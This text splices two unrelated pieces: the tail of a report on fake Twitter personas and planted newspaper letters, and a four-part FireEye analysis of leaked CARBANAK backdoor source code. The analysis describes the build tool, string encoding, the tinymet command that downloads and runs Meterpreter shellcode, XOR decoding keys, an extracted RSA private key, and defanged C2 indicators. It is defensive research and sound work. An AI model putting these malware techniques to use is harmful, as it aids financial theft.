US House candidate, NY-13

9/26/2018

U.S. Congressional Candidate for NY District 13 serving Harlem, Washington Heights and Western Bronx.US

@TynioAnya

Anya Tynio

 

9/26/2018

 

@livengood_marla

Marla Livengood

 

9/23/2018

 

@Fall_Of_Amercia

Fall_of_Amercia

save the US

9/8/2018

Washington, DC

@IsabelleKingsly

Elizabeth Warren not for 2020

Single. Iranian-American. Lifestyle.And a tad of politics. @ewarren not for 2020.

9/8/2018

Seattle, WA

@MathewObrien1

Mathew Obrien

A single boy,@Newsday correspondent , interested in news Scientist🔬. Animal 🐘 and Nature lover🌲, hiker and backpacker♍   .

6/21/2018

New York, NY

@HumanBeingUSA

Human-Rights

The fight for human rights never sleeps, standing up for human rights across the world, wherever justice, freedom, fairness and truth are denied.

6/14/2018

New York, USA

@ashleyc57528342

ashley cohen

follow me to get follow back

6/14/2018

Arizona, USA

@josefsanchezzzz

josef sanchez

 

6/10/2018

 

@GuillouJan

jan guillou

 

5/13/2018

 

@saidqutb2

saidqutb

 

5/12/2018

 

@olegkashin4321

rajat sharma

 

5/8/2018

 

@Suzan_Nicolson

Suzan Nicholson

follow me to get follow back

5/8/2018

Las Vegas, NV

@caroloffoff

diana culi

 

5/7/2018

 

@hairullomirsaid

guillem balague

 

5/7/2018

 

@habibayyoub1

habib ayyoub

 

5/6/2018

 

@daphneposh

James Anderson

No Magats 🚫, 🔥 Anti War & Hate, Pro Equality, Humanity, Humor & Sensible Gun Reform

4/30/2018

New York, USA

@JohnHoward333

John H.T

Journalist. RTs Are not necessarily endorsements. All views my own. #Resist

5/12/2015

Washington, USA

@AlexRyanNY

Alex Ryan

New Yorker, @Newsday correspondent.

You don't have a soul. You are a Soul. You have a body.

4/17/2011

New York, USA

Table 1: Sample Twitter accounts identified in this network

Appendix 2: Sample letters published in news outlets submitted by personas identified in this network, August 2018 to April 2019.

Date

Author

Author’s Listed Location

Newspaper

Article

Aug. 1, 2018

Jeremy Watte

Baytown

The Baytown Sun (baytownsun.com)

Title: “Trump’s wall just a vanity project”

The letter argues against the Trump administration’s proposed border wall with Mexico. The text of the letter is identical to that published in Galveston County’s The Daily News (galvnews.com) on Aug. 4, 2018, three days later.

http://baytownsun.com/opinion/article_85fa9df4-9527-11e8-9aa8-1bb745e7141a.html

Aug. 4, 2018

Ed Sullivan

Galveston

Galveston County’s The Daily News (galvnews.com)

Title: “Trump cares not one wit about effects of shutdown”

The text of the letter is identical to that published in The Baytown Sun on Aug. 1.

https://www.galvnews.com/opinion/guest_columns/article_7d5b3e9b-cbdd-5ac8-8c91-3a1eb0da3df7.html

Oct. 11, 2018

Jeremy Watte

Baytown

The Baytown Sun (baytownsun.com)

Title: “Time to fight for it”

The letter, written from the point of view of an individual aligned with the U.S. political left, calls on individuals to fight for justice.

http://baytownsun.com/opinion/article_915fde6c-ccf3-11e8-a085-33dce44563d1.html

Oct. 23, 2018

Ed Sullivan

Newport News

New York Daily News (nydailynews.com)

Title: “Don’t shrug off Khashoggi’s murder”

The letter argues that “the most fitting and best memorial to Jamal Khashoggi,” a Saudi journalist who was murdered in the Saudi embassy in Istanbul, “would be the swift end to the war in Yemen.”

https://www.nydailynews.com/dp-edt-letswed-1024-story.html

Oct. 23, 2018

Ed Sullivan

Newport News

Los Angeles Times (latimes.com)

Title: “Don’t shrug off Khashoggi’s murder”

The letter is identical to that published in the New York Daily News on the same day.

https://www.latimes.com/dp-edt-letswed-1024-story.html

Nov. 27, 2018

John Turner

New York, NY

Times of Israel (blog.timesofisrael.com)

Title: “Saudi Arabia’s foreign policy is failing”

The letter states that the murder of Jamal Khashoggi is “the latest in a series of foreign policy blunders” committed by the Saudi Crown Prince Mohammed Bin Salman.

https://blogs.timesofisrael.com/saudi-arabias-foreign-policy-is-failing/

Nov. 30, 2018

John Turner

New York, NY

Times of Israel (blog.timesofisrael.com)

Title: “Relations with Israel will not benefit Gulf states”

The letter argues that the Gulf states will not benefit from normalized relations with Israel, stating that “the Arab street” would not support those relations and that such a move would be risky for “the Gulf’s unelected rulers.”

https://blogs.timesofisrael.com/relations-with-israel-will-not-benefit-gulf-states/

Dec. 26, 2018

Isabelle Kingsly

Galveston

The Baytown Sun (baytownsun.com)

Title: “Wild West sheriff”

The letter argues that Trump is not an aberration in U.S. history, but rather an ideological descendant of various U.S. historical currents; the article also calls him “an authoritarian, racist madman.”

http://baytownsun.com/opinion/letters/article_4ad26b8c-08bb-11e9-9056-3f5207ea4cf7.html

Jan. 18, 2019

Jeremy Watte

Seattle

Seattle Times (seattletimes.com)

Title: “ISIS’ ideology not defeated”

The letter, written in response to an article about Americans killed by an ISIS suicide bomber in Syria, asserts that the Islamic extremist ideology espoused by the terrorist group remains undefeated.

https://www.seattletimes.com/opinion/letters-to-the-editor/isis-ideology-not-defeated/

March 1, 2019

Jeremy Watte

Baytown

The Baytown Sun (baytownsun.com)

Title: “Sins of Saudi Arabia”

The letter is condemnatory of Saudi Arabia, citing its actions in the Yemen conflict, the killing of Jamal Khashoggi, the killing of Zakaria al-Jaber, a Shiite child, in Medina, and the imprisonment of Saudi women activists. The letter also defends Iran, stating that it is not responsible for similar crimes.

http://baytownsun.com/opinion/article_4c8f1d4e-3bce-11e9-a391-37761ca39ef2.html

April 9, 2019

Mathew Obrien

Galveston

Galveston County’s The Daily News (galvnews.com)

Title: “Sanctioning Islamic corps is pure madness”

The letter condemns the Trump administration’s designation of the IRGC as a Foreign Terrorist Organization and claims that Trump is seeking to start a war with Iran.

https://www.galvnews.com/opinion/letters_to_editor/article_860e6c9b-1e22-5871-a1ea-d8d466fccc94.html

April 11, 2019

Matthew Obrien

Athens

Athens Daily Review (athensreview.com)

Title: “Trump, Bolton trying to start war with Iran”

The letter, similar to the April 9 letter published in Galveston County’s The Daily News, claims that Trump and Bolton are trying to start a war with Iran to use the war in Trump’s 2020 presidential campaign, while disregarding the alleged crimes of Saudi Arabia.

https://www.athensreview.com/opinion/letters_to_the_editor/trump-bolton-trying-to-start-war-with-iran/article_e41a029e-5ca5-11e9-b59b-4f174bf94dcd.html

April 11, 2019

Isabelle Kingsly

Newport News

Daily Press (dailypress.com)

Title: “An uneasy path – Re; Recent Iran sanction reports”

The letter also argues that Trump and Bolton are seeking to start a war with Iran toward political ends.

https://www.dailypress.com/news/opinion/letters/dp-edt-letsfri-0412-story.html

April 19, 2019

Jeremy Watte

Baytown

The Baytown Sun (baytownsun.com)

Title: “Escalating hostility toward Iran”

The letter argues that the election of Trump to the U.S. presidency has set the U.S. on a dangerous course and condemns the U.S. withdrawal from the Iran nuclear deal (JCPOA), stating that “the ayatollahs have welcomed this abrogation of honor on Trump’s part.”

http://baytownsun.com/opinion/article_fd3f8bfa-6249-11e9-992a-d373a2b5a5a4.html

April 23, 2019

Ed Sullivan

Galveston

Galveston County’s The Daily News (galvnews.com)

Title: “Escalating hostility toward Iran is wrong, dangerous”

The text of this letter is nearly identical to that authored by Jeremy Watte and published in The Baytown Sun on April 19, excepting changes made in several sentences.

https://www.galvnews.com/opinion/letters_to_editor/article_0409879b-fff9-5ab8-bbf5-a49a1c1592d9.html

Table 2: Sample letters published in news outlets submitted by personas in this network

CARBANAK Week Part Four: The CARBANAK Desktop Video Player

Part One, Part Two and Part Three of CARBANAK Week are behind us. In this final blog post, we dive into one of the more interesting tools that is part of the CARBANAK toolset. The CARBANAK authors wrote their own video player and we happened to come across an interesting video capture from CARBANAK of a network operator preparing for an offensive engagement. Can we replay it?

About the Video Player

The CARBANAK backdoor is capable of recording video of the victim’s desktop. Attackers reportedly viewed recorded desktop videos to gain an understanding of the operational workflow of employees working at targeted banks, allowing them to successfully insert fraudulent transactions that remained undetected by the banks’ verification processes. As mentioned in a previous blog post announcing the arrest of several FIN7 members, the video data file format and the player used to view the videos appeared to be custom written. The video player, shown in Figure 1, and the C2 server for the bots were designed to work together as a pair.


Figure 1: CARBANAK desktop video player

The C2 server wraps video stream data received from a CARBANAK bot in a custom video file format that the video player understands, and writes these video files to a location on disk based on a convention assumed by the video player. The StreamVideo constructor shown in Figure 2 creates a new video file that will be populated with the video capture data received from a CARBANAK bot, prepending a header that includes the signature TAG, timestamp data, and the IP address of the infected host. This code is part of the C2 server project.


Figure 2: carbanak\server\Server\Stream.cs – Code snippet from the C2 server that serializes video data to file

Figure 3 shows the LoadVideo function that is part of the video player project. It validates the file type by looking for the TAG signature, then reads the timestamp values and IP address just as they were written by the C2 server code in Figure 2.


Figure 3: carbanak\server\Player\Video.cs – Player code that loads a video file created by the C2 server

Video files have the extension .frm as shown in Figure 4 and Figure 5. The C2 server’s CreateStreamVideo function shown in Figure 4 formats a file path following a convention defined in the MakeStreamFileName function, and then calls the StreamVideo constructor from Figure 2.


Figure 4: carbanak\server\Server\RecordFromBot.cs – Function in the C2 server that formats a video file name and adds the extension "frm"

The video player code snippet shown in Figure 5 follows video file path convention, searching all video file directories for files with the extension .frm that have begin and end timestamps that fall within the range of the DateTime variable dt.


Figure 5: carbanak\server\Player\Video.cs – Snippet from Player code that searches for video files with "frm" extension

An Interesting Video

We came across several video files, but only some were compatible with this video player. After some analysis, it was discovered that there are at least two different versions of the video file format, one with compressed video data and the other is raw. After some slight adjustments to the video processing code, both formats are now supported and we can play all videos.

Figure 6 shows an image from one of these videos in which the person being watched appears to be testing post-exploitation commands and ensuring they remain undetected by certain security monitoring tools.


Figure 6: Screenshot of video playback captured by CARBANAK video capability

The list of commands in the figure centers around persistence, screenshot creation, and launching various payloads. Red teamers often maintain such generic notes and command snippets for accomplishing various tasks like persisting, escalating, laterally moving, etc. An extreme example of this is Ben Clark’s book RTFM. In advance of an operation, it is customary to tailor the file names, registry value names, directories, and other parameters to afford better cover and prevent blue teams from drawing inferences based on methodology. Furthermore, Windows behavior sometimes yields surprises, such as value length limitations, unexpected interactions between payloads and specific persistence mechanisms, and so on. It is in the interest of the attacker to perform a dry run and ensure that unanticipated issues do not jeopardize the access that was gained.

The person being monitored via CARBANAK in this video appears to be a network operator preparing for attack. This could either be because the operator was testing CARBANAK, or because they were being monitored. The CARBANAK builder and other interfaces are never shown, and the operator is seen preparing several publicly available tools and tactics. While purely speculation, it is possible that this was an employee of the front company Combi Security which we now know was operated by FIN7 to recruit potentially unwitting operators. Furthermore, it could be the case that FIN7 used CARBANAK’s tinymet command to spawn Meterpreter instances and give unwitting operators access to targets using publicly available tools under the false premise of a penetration test.

Conclusion

This final installment concludes our four-part series, lovingly dubbed CARBANAK Week. To recap, we have shared at length many details concerning our experience as reverse engineers who, after spending dozens of hours reverse engineering a large, complex family of malware, happened upon the source code and toolset for the malware. This is something that rarely ever happens!

We hope this week’s lengthy addendum to FireEye’s continued CARBANAK research has been interesting and helpful to the broader security community in examining the functionalities of the framework and some of the design considerations that went into its development.

So far we have received lots of positive feedback about our discovery of the source code and our recent exposé of the CARBANAK ecosystem. It is worth highlighting that much of what we discussed in CARBANAK Week was originally covered in our FireEye’s Cyber Defense Summit 2018 presentation titled “Hello, Carbanak!”, which is freely available to watch online (a must-see for malware and lederhosen enthusiasts alike). You can expect similar topics and an electrifying array of other malware analysis, incident response, forensic investigation and threat intelligence discussions at FireEye’s upcoming Cyber Defense Summit 2019, held Oct. 7 to Oct. 10, 2019, in Washington, D.C.

CARBANAK Week Part Three: Behind the CARBANAK Backdoor

We covered a lot of ground in Part One and Part Two of our CARBANAK Week blog series. Now let's take a look back at some of our previous analysis and see how it holds up.

In June 2017, we published a blog post sharing novel information about the CARBANAK backdoor, including technical details, intel analysis, and some interesting deductions about its operations we formed from the results of automating analysis of hundreds of CARBANAK samples. Some of these deductions were claims about the toolset and build practices for CARBANAK. Now that we have a snapshot of the source code and toolset, we also have a unique opportunity to revisit these deductions and shine a new light on them.

Was There a Build Tool?

Let’s first take a look at our deduction about a build tool for CARBANAK:

“A build tool is likely being used by these attackers that allows the operator to configure details such as C2 addresses, C2 encryption keys, and a campaign code. This build tool encrypts the binary’s strings with a fresh key for each build.”

We came to this deduction from the following evidence:

“Most of CARBANAK’s strings are encrypted in order to make analysis more difficult. We have observed that the key and the cipher texts for all the encrypted strings are changed for each sample that we have encountered, even amongst samples with the same compile time. The RC2 key used for the HTTP protocol has also been observed to change among samples with the same compile time. These observations paired with the use of campaign codes that must be configured denote the likely existence of a build tool.”

Figure 1 shows three keys used to decode the strings in CARBANAK, each pulled from a different CARBANAK sample.


Figure 1: Decryption keys for strings in CARBANAK are unique for each build

It turns out we were spot-on with this deduction. A build tool was discovered in the CARBANAK source dump, pictured with English translations in Figure 2.


Figure 2: CARBANAK build tool

With this build tool, you specify a set of configuration options along with a template CARBANAK binary, and it bakes the configuration data into the binary to produce the final build for distribution. The Prefix text field allows the operator to specify a campaign code. The Admin host text fields are for specifying C2 addresses, and the Admin password text field is the secret used to derive the RC2 key for encrypting communication over CARBANAK’s pseudo-HTTP protocol. This covers part of our deduction: we now know for a fact that a build tool exists and is used to configure the campaign code and RC2 key for the build, amongst other items. But what about the encoded strings? Since this would be something that happens seamlessly behind the scenes, it makes sense that no evidence of it would be found in the GUI of the build tool. To learn more, we had to go to the source code for both the backdoor and the build tool.

Figure 3 shows a preprocessor identifier named ON_CODE_STRING defined in the CARBANAK backdoor source code that when enabled, defines macros that wrap all strings the programmer wishes to encode in the binary. These functions sandwich the strings to be encoded with the strings “BS” and “ES”. Figure 4 shows a small snippet of code from the header file of the build tool source code defining BEG_ENCODE_STRING as “BS” and END_ENCODE_STRING as “ES”. The build tool searches the template binary for these “BS” and “ES” markers, extracts the strings between them, encodes them with a randomly generated key, and replaces the strings in the binary with the encoded strings. We came across an executable named bot.dll that happened to be one of the template binaries to be used by the build tool. Running strings on this binary revealed that most meaningful strings that were specific to the workings of the CARBANAK backdoor were, in fact, sandwiched between “BS” and “ES”, as shown in Figure 5.


Figure 3: ON_CODE_STRING parameter enables easy string wrapper macros to prepare strings for encoding by build tool


Figure 4: builder.h macros for encoded string markers


Figure 5: Encoded string markers in template CARBANAK binary

Operators’ Access To Source Code

Let’s look at two more related deductions from our blog post:

“Based upon the information we have observed, we believe that at least some of the operators of CARBANAK either have access to the source code directly with knowledge on how to modify it or have a close relationship to the developer(s).”

“Some of the operators may be compiling their own builds of the backdoor independently.”

The first deduction was based on the following evidence:

“Despite the likelihood of a build tool, we have found 57 unique compile times in our sample set, with some of the compile times being quite close in proximity. For example, on May 20, 2014, two builds were compiled approximately four hours apart and were configured to use the same C2 servers. Again, on July 30, 2015, two builds were compiled approximately 12 hours apart.”

To investigate further, we performed a diff of two CARBANAK samples with very close compile times to see what, if anything, was changed in the code. Figure 6 shows one such difference.


Figure 6: Minor differences between two closely compiled CARBANAK samples

The POSLogMonitorThread function is only executed in Sample A, while the blizkoThread function is only executed in Sample B (Blizko is a Russian funds transfer service, similar to PayPal). The POSLogMonitorThread function monitors for changes made to log files for specific point of sale software and sends parsed data to the C2 server. The blizkoThread function determines whether the user of the computer is a Blizko customer by searching for specific values in the registry. With knowledge of these slight differences, we searched the source code and discovered once again that preprocessor parameters were put to use. Figure 7 shows how this function will change depending on which of three compile-time parameters are enabled.


Figure 7: Preprocessor parameters determine which functionality will be included in a template binary

This is not definitive proof that operators had access to the source code, but it certainly makes it much more plausible. The operators would not need to have any programming knowledge in order to fine tune their builds to meet their needs for specific targets, just simple guidance on how to add and remove preprocessor parameters in Visual Studio.

Evidence for the second deduction was found by looking at the binary C2 protocol implementation and how it has evolved over time. From our previous blog post:

“This protocol has undergone several changes over the years, each version building upon the previous version in some way. These changes were likely introduced to render existing network signatures ineffective and to make signature creation more difficult.”

Five versions of the binary C2 protocol were discovered amongst our sample set, as shown in Figure 8. This figure shows the first noted compile time that each protocol version was found amongst our sample set. Each new version improved the security and complexity of the protocol.


Figure 8: Binary C2 protocol evolution shown through binary compilation times

If the CARBANAK project was centrally located and only the template binaries were delivered to the operators, it would be expected that sample compile times should fall in line with the evolution of the binary protocol. Except for one sample that implements what we call “version 3” of the protocol, this is how our timeline looks. A probable explanation for the date not lining up for version 3 is that our sample set was not wide enough to include the first sample of this version. This is not the only case we found of an outdated protocol being implemented in a sample; Figure 9 shows another example of this.


Figure 9: CARBANAK sample using outdated version of binary protocol

In this example, a CARBANAK sample found in the wild was using protocol version 4 when a newer version had already been available for at least two months. This would not be likely to occur if the source code were kept in a single, central location. The rapid-fire fine tuning of template binaries using preprocessor parameters, combined with several samples of CARBANAK in the wild implementing outdated versions of the protocol indicate that the CARBANAK project is distributed to operators and not kept centrally.

Names of Previously Unidentified Commands

The source code revealed the names of commands whose names were previously unidentified. In fact, it also revealed commands that were altogether absent from the samples we previously blogged about because the functionality was disabled. Table 1 shows the commands whose names were newly discovered in the CARBANAK source code, along with a summary of our analysis from the blog post.

Hash

Prior FireEye Analysis

Name

0x749D968

(absent)

msgbox

0x6FD593

(absent)

ifobs

0xB22A5A7

Add/update klgconfig

updklgcfg

0x4ACAFC3

Upload files to the C2 server

findfiles

0xB0603B4

Download and execute shellcode

tinymet

Table 1: Command hashes previously not identified by name, along with description from prior FireEye analysis

The msgbox command was commented out altogether in the CARBANAK source code, and is strictly for debugging, so it never appeared in public analyses. Likewise, the ifobs command did not appear in the samples we analyzed and publicly documented, but likely for a different reason. The source code in Figure 10 shows the table of commands that CARBANAK understands, and the ifobs command (0x6FD593) is surrounded by an #ifdef, preventing the ifobs code from being compiled into the backdoor unless the ON_IFOBS preprocessor parameter is enabled.


Figure 10: Table of commands from CARBANAK tasking code

One of the more interesting commands, however, is tinymet, because it illustrates how source code can be both helpful and misleading.

The tinymet Command and Associated Payload

At the time of our initial CARBANAK analysis, we indicated that command 0xB0603B4 (whose name was unknown at the time) could execute shellcode. The source code reveals that the command (whose actual name is tinymet) was intended to execute a very specific piece of shellcode. Figure 12 shows an abbreviated listing of the code for handling the tinymet command, with line numbers in yellow and selected lines hidden (in gray) to show the code in a more compact format.


Figure 11: Abbreviated tinymet code listing

The comment starting on line 1672 indicates:

tinymet command
Command format: tinymet {ip:port | plugin_name} [plugin_name]
Retrieve meterpreter from specified address and launch in memory

On line 1710, the tinymet command handler uses the single-byte XOR key 0x50 to decode the shellcode. Of note, on line 1734 the command handler allocates five extra bytes and line 1739 hard-codes a five-byte mov instruction into that space. It populates the 32-bit immediate operand of the mov instruction with the socket handle number for the server connection that it retrieved the shellcode from. The implied destination operand for this mov instruction is the edi register.

Our analysis of the tinymet command ended here, until the binary file named met.plug was discovered. The hex dump in Figure 12 shows the end of this file.


Figure 12: Hex dump of met.plug

The end of the file is misaligned by five missing bytes, corresponding to the dynamically assembled mov edi preamble in the tasking source code. However, the single-byte XOR key 0x50 that was found in the source code did not succeed in decoding this file. After some confusion and further analysis, it was realized that the first 27 bytes of this file are a shellcode decoder that looked very similar to call4_dword_xor. Figure 13 shows the shellcode decoder and the beginning of the encoded metsrv.dll. The XOR key the shellcode uses is 0xEF47A2D0 which fits with how the five-byte mov edi instruction, decoder, and adjacent metsrv.dll will be laid out in memory.


Figure 13: Shellcode decoder

Decoding yielded a copy of metsrv.dll starting at offset 0x1b. When shellcode execution exits the decoder loop, it executes Metasploit’s executable DOS header.

Ironically, possessing source code biased our binary analysis in the wrong direction, suggesting a single-byte XOR key when really there was a 27-byte decoder preamble using a four-byte XOR key. Furthermore, the name of the command being tinymet suggested that the TinyMet Meterpreter stager was involved. This may have been the case at one point, but the source code comments and binary files suggest that the developers and operators have moved on to simply downloading Meterpreter directly without changing the name of the command.

Conclusion

Having access to the source code and toolset for CARBANAK provided us with a unique opportunity to revisit our previous analysis. We were able to fill in some missing analysis and context, validate our deductions in some cases, and provide further evidence in other cases, strengthening our confidence in them but not completely proving them true. This exercise proves that even without access to the source code, with a large enough sample set and enough analysis, accurate deductions can be reached that go beyond the source code. It also illustrates, such as in the case of the tinymet command, that sometimes, without the proper context, you simply cannot see the full and clear purpose of a given piece of code. But some source code is also inconsistent with the accompanying binaries. If Bruce Lee had been a malware analyst, he might have said that source code is like a finger pointing away to the moon; don’t concentrate on the finger, or you will miss all that binary ground truth. Source code can provide immensely rich context, but analysts must be cautious not to misapply that context to binary or forensic artifacts.

In the next and final blog post, we share details on an interesting tool that is part of the CARBANAK kit: a video player designed to play back desktop recordings captured by the backdoor.

CARBANAK Week Part Two: Continuing the CARBANAK Source Code Analysis

FireEye has observed the certificate most recently being served on the following IPs (Table 4):

IP

Hostname

Last Seen

104.193.252.151:443

vds2.system-host[.]net

2019-04-26T14:49:12

185.180.196.35:443

customer.clientshostname[.]com

2019-04-24T07:44:30

213.227.155.8:443

 

2019-04-24T04:33:52

94.156.133.69:443

 

2018-11-15T10:27:07

185.174.172.241:443

vds9992.hyperhost[.]name

2019-04-27T13:24:36

109.230.199.227:443

 

2019-04-27T13:24:36

Table 4: Recent Test Company certificate use

While these IPs have not been observed in any CARBANAK activity, this may be an indication of a common developer or a shared toolkit used for testing various malware. Several of these IPs have been observed hosting Cobalt Strike BEACON payloads and METERPRETER listeners. Virtual Private Server (VPS) IPs may change hands frequently and additional malicious activity hosted on these IPs, even in close time proximity, may not be associated with the same users.

I also parsed an unprotected private key from the source code dump. Figure 4 and Table 5 show the private key parameters at a glance and in detail, respectively.


Figure 4: Parsed 512-bit private key

Field

Value

bType

7

bVersion

2

aiKeyAlg

0xA400 (CALG_RSA_KEYX) – RSA public key exchange algorithm

Magic

RSA2

Bitlen

512

PubExp

65537

Modulus

0B CA 8A 13 FD 91 E4 72 80 F9 5F EE 38 BC 2E ED

20 5D 54 03 02 AE D6 90 4B 6A 6F AE 7E 06 3E 8C

EA A8 15 46 9F 3E 14 20 86 43 6F 87 BF AE 47 C8

57 F5 1F D0 B7 27 42 0E D1 51 37 65 16 E4 93 CB

P

8B 01 8F 7D 1D A2 34 AE CA B6 22 EE 41 4A B9 2C

E0 05 FA D0 35 B2 BF 9C E6 7C 6E 65 AC AE 17 EA

Q

81 69 AB 3D D7 01 55 7A F8 EE 3C A2 78 A5 1E B1

9A 3B 83 EC 2F F1 F7 13 D8 1A B3 DE DF 24 A1 DE

Dp

B5 C7 AE 0F 46 E9 02 FB 4E A2 A5 36 7F 2E ED A4

9E 2B 0E 57 F3 DB 11 66 13 5E 01 94 13 34 10 CB

Dq

81 AC 0D 20 14 E9 5C BF 4B 08 54 D3 74 C4 57 EA

C3 9D 66 C9 2E 0A 19 EA C1 A3 78 30 44 52 B2 9F

Iq

C2 D2 55 32 5E 7D 66 4C 8B 7F 02 82 0B 35 45 18

24 76 09 2B 56 71 C6 63 C4 C5 87 AD ED 51 DA 2ª

D

01 6A F3 FA 6A F7 34 83 75 C6 94 EB 77 F1 C7 BB

7C 68 28 70 4D FB 6A 67 03 AE E2 D8 8B E9 E8 E0

2A 0F FB 39 13 BD 1B 46 6A D9 98 EA A6 3E 63 A8

2F A3 BD B3 E5 D6 85 98 4D 1C 06 2A AD 76 07 49

Table 5: Private key parameters

I found a value named PUBLIC_KEY defined in a configuration header, with comments indicating it was for debugging purposes. The parsed values are shown in Table 6.

Field

Value

bType

6

bVersion

2

aiKeyAlg

0xA400 (CALG_RSA_KEYX) – RSA public key exchange algorithm

Magic

RSA1

Bitlen

512

PubExp

65537

Modulus

0B CA 8A 13 FD 91 E4 72 80 F9 5F EE 38 BC 2E ED

20 5D 54 03 02 AE D6 90 4B 6A 6F AE 7E 06 3E 8C

EA A8 15 46 9F 3E 14 20 86 43 6F 87 BF AE 47 C8

57 F5 1F D0 B7 27 42 0E D1 51 37 65 16 E4 93 CB

Table 6: Key parameters for PUBLIC_KEY defined in configuration header

Network Based Indicators

The source code and binaries contained multiple Network-Based Indicators (NBIs) having significant overlap with CARBANAK backdoor activity and FIN7 operations previously observed and documented by FireEye. Table 7 shows these indicators along with the associated FireEye public documentation. This includes the status of each NBI as it was encountered (active in source code, commented out, or compiled into a binary). Domain names are de-fanged to prevent accidental resolution or interaction by browsers, chat clients, etc.

NBI

Status

Threat Group Association

comixed[.]org

Commented out

Earlier CARBANAK activity

194.146.180[.]40

Commented out

Earlier CARBANAK activity

aaaabbbbccccc[.]org

Active

 

stats10-google[.]com

Commented out

FIN7

192.168.0[.]100:700

Active

 

80.84.49[.]50:443

Commented out

 

52.11.125[.]44:443

Commented out

 

85.25.84[.]223

Commented out

 

qwqreererwere[.]com

Active

 

akamai-technologies[.]org

Commented out

Earlier CARBANAK activity

192.168.0[.]100:700

Active

 

37.1.212[.]100:700

Commented out

 

188.138.98[.]105:710

Commented out

Earlier CARBANAK activity

hhklhlkhkjhjkjk[.]org

Compiled

 

192.168.0[.]100:700

Compiled

 

aaa.stage.4463714.news.meteonovosti[.]info

Compiled

DNS infrastructure overlap with later FIN7 associated POWERSOURCE activity

193.203.48[.]23:800

Active

Earlier CARBANAK activity

Table 7: NBIs and prevously observed activity

Four of these TCP endpoints (80.84.49[.]50:443, 52.11.125[.]44:443, 85.25.84[.]223, and 37.1.212[.]100:700) were new to me, although some have been documented elsewhere.

Conclusion

Our analysis of this source code dump confirmed it was CARBANAK and turned up a few new and interesting data points. We were able to notify vendors about disclosures that specifically targeted their security suites. The previously documented NBIs, Windows API function resolution, backdoor command hash values, usage of Windows cabinet file APIs, and other artifacts associated with CARBANAK all match, and as they say, if the shoe fits, wear it. Interestingly though, the project itself isn’t called CARBANAK or even Anunak as the information security community has come to call it based on the string artifacts found within the malware. The authors mainly refer to the malware as “bot” in the Visual Studio project, filenames, source code comments, output binaries, user interfaces, and manuals.

The breadth and depth of this analysis was a departure from the usual requests we receive on the FLARE team. The journey included learning some Russian, searching through a hundred thousand of lines of code for new information, and analyzing a few dozen binaries. In the end, I’m thankful I had the opportunity to take this request.

In the next post, Tom Bennett takes the reins to provide a retrospective on his and Barry Vengerik’s previous analysis in light of the source code. Part Four of CARBANAK Week is available as well.

CARBANAK Week Part One: A Rare Occurrence

It is very unusual for FLARE to analyze a prolifically-used, privately-developed backdoor only to later have the source code and operator tools fall into our laps. Yet this is the extraordinary circumstance that sets the stage for CARBANAK Week, a four-part blog series that commences with this post.

CARBANAK is one of the most full-featured backdoors around. It was used to perpetrate millions of dollars in financial crimes, largely by the group we track as FIN7. In 2017, Tom Bennett and Barry Vengerik published Behind the CARBANAK Backdoor, which was the product of a deep and broad analysis of CARBANAK samples and FIN7 activity across several years. On the heels of that publication, our colleague Nick Carr uncovered a pair of RAR archives containing CARBANAK source code, builders, and other tools (both available in VirusTotal: kb3r1p and apwmie).

FLARE malware analysis requests are typically limited to a few dozen files at most. But the CARBANAK source code was 20MB comprising 755 files, with 39 binaries and 100,000 lines of code. Our goal was to find threat intelligence we missed in our previous analyses. How does an analyst respond to a request with such breadth and open-ended scope? And what did we find?

My friend Tom Bennett and I spoke about this briefly in our 2018 FireEye Cyber Defense Summit talk, Hello, Carbanak! In this blog series, we will expound at length and share a written retrospective on the inferences drawn in our previous public analysis based on binary code reverse engineering. In this first part, I’ll discuss Russian language concerns, translated graphical user interfaces of CARBANAK tools, and anti-analysis tactics as seen from a source code perspective. We will also explain an interesting twist where analyzing the source code surprisingly proved to be just as difficult as analyzing the binary, if not more. There’s a lot here; buckle up!

File Encoding and Language Considerations

The objective of this analysis was to discover threat intelligence gaps and better protect our customers. To begin, I wanted to assemble a cross-reference of source code files and concepts of specific interest.

Reading the source code entailed two steps: displaying the files in the correct encoding, and learning enough Russian to be dangerous. Figure 1 shows CARBANAK source code in a text editor that is unaware of the correct encoding.


Figure 1: File without proper decoding

Two good file encoding guesses are UTF-8 and code page 1251 (Cyrillic). The files were mostly code page 1251 as shown in Figure 2.


Figure 2: Code Page 1251 (Cyrillic) source code

Figure 2 is a C++ header file defining error values involved in backdoor command execution. Most identifiers were in English, but some were not particularly descriptive. Ergo, the second and more difficult step was learning some Russian to benefit from the context offered by the source code comments.

FLARE has fluent Russian speakers, but I took it upon myself to minimize my use of other analysts’ time. To this end, I wrote a script to tear through files and create a prioritized vocabulary list. The script, which is available in the FireEye vocab_scraper GitHub repository, walks source directories finding all character sequences outside the printable lower ASCII range: decimal values 32 (the space character) through 126 (the tilde character “~”) inclusive. The script adds each word to a Python defaultdict_ and increments its count. Finally, the script orders this dictionary by frequency of occurrence and dumps it to a file.

The result was a 3,400+ word vocabulary list, partially shown in Figure 3.


Figure 3: Top 19 Cyrillic character sequences from the CARBANAK source code

I spent several hours on Russian language learning websites to study the pronunciation of Cyrillic characters and Russian words. Then, I looked up the top 600+ words and created a small dictionary. I added Russian language input to an analysis VM and used Microsoft’s on-screen keyboard (osk.exe) to navigate the Cyrillic keyboard layout and look up definitions.

One helpful effect of learning to pronounce Cyrillic characters was my newfound recognition of English loan words (words that are borrowed from English and transliterated to Cyrillic). My small vocabulary allowed me to read many comments without looking anything up. Table 1 shows a short sampling of some of the English loan words I encountered.

Cyrillic

English Phonetic

English

Occurrences

Rank

Файл

f ah y L

file

224

5

сервер

s e r v e r

server

145

13

адрес

a d r e s

address

52

134

команд

k o m a n d

command

110+

27

бота

b o t a

bot

130

32

плагин

p l ah g ee n

plugin

116

39

сервис

s e r v ee s

service

70

46

процесс

p r o ts e s s

process

130ish

63

Table 1: Sampling of English loan words in the CARBANAK source code

Aside from source code comments, understanding how to read and type in Cyrillic came in handy for translating the CARBANAK graphical user interfaces I found in the source code dump. Figure 4 shows a Command and Control (C2) user interface for CARBANAK that I translated.


Figure 4: Translated C2 graphical user interface

These user interfaces included video management and playback applications as shown in Figure 5 and Figure 6 respectively. Tom will share some interesting work he did with these in a subsequent part of this blog series.


Figure 5: Translated video management application user interface


Figure 6: Translated video playback application user interface

Figure 7 shows the backdoor builder that was contained within the RAR archive of operator tools.


Figure 7: Translated backdoor builder application user interface

The operator RAR archive also contained an operator’s manual explaining the semantics of all the backdoor commands. Figure 8 shows the first few commands in this manual, both in Russian and English (translated).


Figure 8: Operator manual (left: original Russian; right: translated to English)

